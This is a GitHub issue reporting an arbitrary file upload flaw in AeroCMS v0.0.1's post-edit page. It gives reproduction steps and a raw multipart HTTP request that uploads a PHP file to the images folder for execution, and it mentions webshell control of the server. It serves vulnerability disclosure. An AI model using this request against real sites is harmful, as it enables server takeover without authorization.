Skip to content
This repository has been archived by the owner on May 8, 2023. It is now read-only.

AeroCMS v0.0.1 Arbitrary File upload vulnerability #5

Open
w4n95 opened this issue Nov 27, 2022 · 0 comments
Open

AeroCMS v0.0.1 Arbitrary File upload vulnerability #5

w4n95 opened this issue Nov 27, 2022 · 0 comments

Comments

@w4n95
Copy link

w4n95 commented Nov 27, 2022

  • Description

In AeroCms v0.0.1, an arbitrary file upload vulnerability at /admin/posts.php?source=edit_post , through which we can upload webshell and control the web server.

  • Step to Reproduct

  1. Login to admin panel -> Posts -> View All Posts -> Edit
    image

  2. when jump to the post edit page, and you can see that the function of uploading pictures exists. upload malicious file phpinfo.php
    image

  3. When upload success access '/images/phpinfo.php', the file was successfully uploaded and executed
    image

  • Vulnerable Code

No file checking before uploading in edit_post.php file
image

  • POC

`POST /AeroCMS/admin/posts.php?source=edit_post&p_id=3 HTTP/1.1
Host: 192.168.111.169
Content-Length: 991
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.111.169
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi7wHcLADqqvNM4nO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.111.169/AeroCMS/admin/posts.php?source=edit_post&p_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2m17ikpogrvubj8l2687hc3n45
Connection: close

------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_title"

mysql
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_category_id"

1
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_user"

admin
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_status"

draft
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="image"; filename="phpinfo.php"
Content-Type: application/octet-stream

------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_tags"

mysql, database
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_content"

AeroCMS is created with mysql database.

------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="update_post"

Edit Post
------WebKitFormBoundaryi7wHcLADqqvNM4nO--
`
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@w4n95